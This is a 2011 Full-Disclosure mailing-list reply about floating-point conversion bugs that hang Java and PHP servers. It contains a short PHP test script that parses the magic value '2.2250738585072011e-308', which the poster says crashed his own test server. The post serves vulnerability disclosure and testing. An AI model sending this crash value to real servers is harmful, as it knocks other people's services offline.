[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] {Java,PHP} Server Exploits
- To: literalka@xxxxxxx
- Subject: Re: [Full-disclosure] {Java,PHP} Server Exploits
- From: Christian Sciberras <uuf6429@xxxxxxxxx>
- Date: Wed, 9 Feb 2011 20:54:41 +0100
Was it fixed? What's the current status?
The sounds like a major issue, and the lack of info about it is darn
impressive.
I tried it on my test Windows WAMP server:
<?php
ob_implicit_flush(true);
echo 'Start test...<br/>';
$f=(float)"2.2250738585072011e-308";
echo 'Try 1 => '.$f.'</br>';
$f=floatval("2.2250738585072011e-308");
echo 'Try 2 => '.$f.'</br>';
$f="2.2250738585072011e-308";
echo 'Try 3 => '.(float)$f.'</br>';
echo 'Test failed, server not vulnerable!</br>';
?>
All three tests succeeded in crashing the server.
With all due respect, this should NOT have been disclosed without being
FIXED (as it seems to me).
Plus, I'm a bit amazed such a bug exists in PHP - since converting to
floating point is a trivial operation, it should have been limited and
safe-guarded from the start.
There are a lot of servers out there happily accepting input as floating
point values, this bug should be top priority...
Chris.
On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser <literalka@xxxxxxxxx> wrote:
>
> http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
>
> http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server<http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Servers>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/